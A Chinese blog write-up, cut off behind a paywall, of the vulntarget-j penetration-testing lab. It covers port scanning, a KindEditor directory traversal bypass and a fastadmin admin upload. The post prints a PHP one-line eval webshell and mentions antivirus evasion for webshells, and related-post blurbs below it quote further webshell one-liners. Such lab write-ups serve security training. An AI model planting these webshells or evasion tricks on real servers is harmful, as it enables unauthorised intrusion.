vulntarget-j(星期五实验室)

ka_ka11

已于 2024-03-26 13:51:43 修改

阅读量650

点赞数 11

文章标签： web安全

于 2024-03-22 15:56:10 首次发布

本文链接：https://blog.youkuaiyun.com/ka_ka11/article/details/136943788

版权

外网打点

外网地址192.168.138.144，nmap进行一下端口扫描

nmap -Pn -sV -p- 192.168.138.144

PORT     STATE SERVICE            VERSION
80/tcp   open  http               Apache httpd 2.4.39 ((Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02)
3389/tcp open  ssl/ms-wbt-server?
5985/tcp open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
7001/tcp open  http               Apache httpd 2.4.39 ((Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02)
MAC Address: 00:0C:29:A1:ED:50 (VMware)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

80端口：fastadmin

指纹识别

fastadmin前台getshell

上传文件失败

如果能找到后台地址的话，还是有机会能拿下的，上扫描，但是没扫到什么东西，可能用的是随机字符的路径

7001端口：KindEditor

发现kindeditor

kindeditor版本

kindeditor文件上传

php目录下发现文件

http://192.168.106.130:7001/php/demo.php
http://192.168.106.130:7001/php/file_manager_json.php
http://192.168.106.130:7001/php/JSON.php

kindeditor目录遍历

http://192.168.138.144:7001/php/file_manager_json.php?path=../

.../../被ban

.././../绕过

找到后台

fastadmin后台getshell

http://192.168.138.144/2.php

同样的办法，上传一句话免杀木马

<?php eval($_POST[cc123]) ?>

使用蚁剑的马子同样被杀

使用XG_NTAI-webshell免杀.jar进行免杀

内网信息收集

杀毒软件

有360安全卫士

免杀做的不太好，靶场主要考验的就是文件上传+免杀

关注博主即可阅读全文

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

ka_ka11

关注关注

11
点赞
踩
5

收藏

觉得还不错? 一键收藏
1
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

vulntarget-j内网靶机write-up

千寻的博客

06-23

2391

注意：需要登录账号或者自己上传一个压缩包，存在漏洞的版本是1.1.0，经过测试1.1.1的已经对输入的进行过滤。第二次上传后:230601(1).asp(此时发现已经存在，进行重命名，进行截断)其中发现80、7001是we b网站，并且7001是个403界面。1、用第一层做中转监听，上线cs（记得关闭第一层的防火墙）发现开放了 80、3389、5985、7001的端口。想要得到这世上最好的东西，得先让世界看到最好的你。2、在进行文件上传，上传冰鞋的马，进行连接。3、进行上线，发现权限太低，上线哥斯拉。

Fastadmin后台插件-在线命令管理-getshell

千寻的博客

05-09

4689

注意：需要登录账号或者自己上传一个压缩包，存在漏洞的版本是1.1.0，经过测试1.1.1的已经对输入的进行过滤。我们在接口生成文件处填入 php 的文件名，在文档标题处填入 php 文件。插件管理–在线命令管理—的插件可以直接命令执行。第一步先上传一个phpinfo,提示成功。第二步上传一个eval。

1 条评论您还未登录，请先登录后发表或查看评论

FastAdmin任意文件读取漏洞，

最新发布

Python_0011的博客

03-07

1246

一、漏洞描述FastAdmin是一款基于ThinkPHP+Bootstrap开发的快速后台开发框架，FastAdmin基于Apache2.0开源协议发布，免费且不限制商业使用，目前被广泛应用于各大行业应用后台管理。astAdmin框架存在任意文件读取漏洞，攻击者利用此漏洞可以获取系统敏感信息。二、影响版本FastAdmin版本 < 1.3.4三、资产测绘app=“FASTADMIN-框架”四、漏洞复现。

乌鸦安全2022年度文章合集

crowsec

01-05

1496

乌鸦安全2022年精选原创文章合集，基本上大部分都是原创，当然还有一部分文章由其他师傅投稿提供，在此感谢各位师傅的投稿和帮助！

网站后台拿webshell

qq_42307546的博客

02-07

2983

当我们通过一些漏洞进入后台之后就要想办法获取网站的控制权限，就是我们所说的拿webshell，这样就可以对网站进行任意编辑，一般都是通过漏洞向目标服务器写入一句话木马来getshell 根据语言的不同，一句话也用多种类型 php一句话 < ?php eval_r($_POST[a])?> asp一句话 <%eval request(“hihack”)%>或<%execute(request(“hihack”))%> jsp一句话 <%if(request.getPa

内网渗透思路10之SPN拿下域控

划水的小白白

10-31

1810

站库分离、外网打点、过杀软、多层网络渗透、横向渗透、jwt token密钥破解、 phpmyadmin写shell、sqlserver 提权、SPN服务的利用、权限提升、域渗透

Vulntarget-b靶场渗透WP

Fear1e4的博客

06-13

580

nmap端口探测网页访问端口目录扫描网页直接登陆报错404。访问admin.php,有后台管理系统登陆页。bp弱口令爆破admin123,版本1.8.1，查漏洞。

vulntarget-j

09-18

vulntarget-j 是一种安全测试平台，旨在模拟真实网络环境中的漏洞，以便于安全专业人员进行渗透测试和漏洞分析。该平台提供了一系列虚拟机和漏洞环境，使用户能够模拟并测试真实世界中常见的漏洞攻击。vulntarget-j ...

打穿内网之Vulntarget-a靶场实战记录

tpaer的博客

11-11

2705

内容包括：通达OA未授权上传+文件包含RCE、Redis未授权写马、ms17-010永恒之蓝、代理转发内网跳板、CVE-2020-1472 域控杀器Zerologon、wmiexec/smbexec横向移动、cobalt strike与msf的shell传递

渗透靶场——vulntarget-a（完整版）

tlovejr的博客

03-25

6335

部署环境此次靶场不再是单个镜像，而是三个镜像文件，接下来先给大家说一下整个环境的拓扑图以环境布置。只需要把win7外网机和kali机同样的网卡host-Only形式即可，剩下的两台即可也是直接安排好了，无需做任何更改。靶机下载地址：信息收集扫描主机扫描同一网段中的存活主机发现一个存活主机（其他的是我自己其他机器）192.168.1.9 扫描端口扫描一下存活靶机的ip地址 nmap -A -p- 192.168.1.9 一看就知道这个存活靶机是一个win7系统，那么对于win7系统来说，4

通达OA低版本文件上传+apache解析漏洞getshell

谢公子的博客

05-12

2042

目录漏洞文件漏洞利用条件漏洞复现漏洞文件 /general/vmeet/privateUpload.php 漏洞利用条件通达OA低版本 apache存在解析漏洞漏洞复现测试环境：通达OA 2008，apache存在解析漏洞首先访问是否存在该文件存在的话，将下面代码保存后缀为1.html文件，然后将木马命名为 aaa.php.1，与1.html在同一个目录下 <form id="frmUpload" enctype="multipart/for..

FastAdmin目录穿越 CVE-2024-7928

iSee857的博客

08-24

1118

Bootstrap开发的快速后台开发框架。FastAdmin基于Apache2.0开源协议发布，免费且不限制商业使用，目前被广泛应用于各大行业应用后台管理。其接口lang存在目录穿越漏洞，攻击者可通过该漏洞获取系统库敏感信息。该漏洞已支持yakit插件检测，根据uuid 39894f51-f782-48eb-bb01-d1e0421b8e9c 进行下载。升级至安全版本：1.3.4.20220530。FastAdmin是一款基于。

漏洞挖掘 | 记一次项目上从前台登录到Getshell

zkaqlaoniao的博客

06-06

425

申明：本账号所分享内容仅用于网络安全技术讨论，切勿用于违法途径，所有渗透都需获取授权，违者后果自行承担，与本号及作者无关，请谨记守法。免费领取安全学习资料包！渗透工具技术文档、书籍面试题帮助你在面试中脱颖而出视频基础到进阶环境搭建、HTML，PHP，MySQL基础学习，信息收集，SQL注入,XSS，CSRF，暴力破解等等应急响应笔记学习路线。

fastadmin 在线命令行提示只允许在开发环境执行命令

夏已微凉、

01-01

4316

fastadmin 在线命令行提示只允许在开发环境执行命令

Libra1313的博客

10-23

9871

经常会有大学生粉丝朋友私信大白，想通过打CTF比赛镀金，作为进入一线互联网大厂的门票。但是在CTF做题很多的时候都会用到工具，所以在全网苦寻CTF比赛工具安装包！

FastAdmin前台分片传输上传文件getshell

正是修行时

10-14

1624

道虽远，行则易至；儒虽难，坚为易成

Apache2.4.39 HTTPS SSL证书配置

wocao2dai的博客

04-07

1247

首先，在腾讯云或者阿里云控制台，搜索ssl，会有免费的版本，我们选择该版本即可。接着选择如下：我们申请好之后，会有一件配置的按钮，点这个是没用的，我们需要下载证书，自己配置。控制台会分析我们的服务器是哪个版本，会推荐对应的ssl版本让我们下载。我们下载后，解压上传至我们的服务器，我们可以通过远程访问服务器，将解压的ssl文件放置到服务器上。文件内容都大同小异，基本上都一样的：接下来的都是重中之重了！！（配置） 1-打开Apache,在里面找到--http...

vulntarget-L(星期五实验室)

ka_ka11的博客

03-20

1621

这个EXCHANGE$就是当前exchang机器的机器用户，而有这个用户的权限是用户组的WriteDACL权限，WriteDACL权限可以修改域对象的ACL，允许委托人修改受影响对象的DACL。我直接在exchange上添加一个网卡，直接进行反弹，后面再看看能不能通过goproxy代理，上线,模拟刚才我们获得system权限，我们进行提权。修改ip地址为自动，修改dns地址为114.114.114.114，修改完成应用，重新。修改tenda 端口转发的地址，修改为自己的出网的ip地址。